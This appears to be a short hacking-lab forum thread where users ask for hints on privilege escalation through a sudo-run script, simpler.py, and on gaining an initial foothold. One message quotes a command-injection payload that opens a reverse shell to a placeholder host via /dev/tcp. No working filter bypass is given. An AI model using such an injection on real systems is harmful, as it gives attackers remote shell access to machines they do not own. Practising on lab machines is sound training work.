Bro, got reverse shell as www-data. And I know I've to privesc using simpler.py. But can't able to figure it out.
executed >sudo -u pepper ./simpler.py -p and when it prompts for the IP address, I used
$(/bin/sh -i >& /dev/tcp/myIP/myPort 0>&1) and it filters the "-","&" symbols. So, how do I exlpoit it.Had been stuck on this machine for ages. Please help me.
Can please you give me a nudge with initial foothold im getting diffrent results when runing the exploit on writeup machine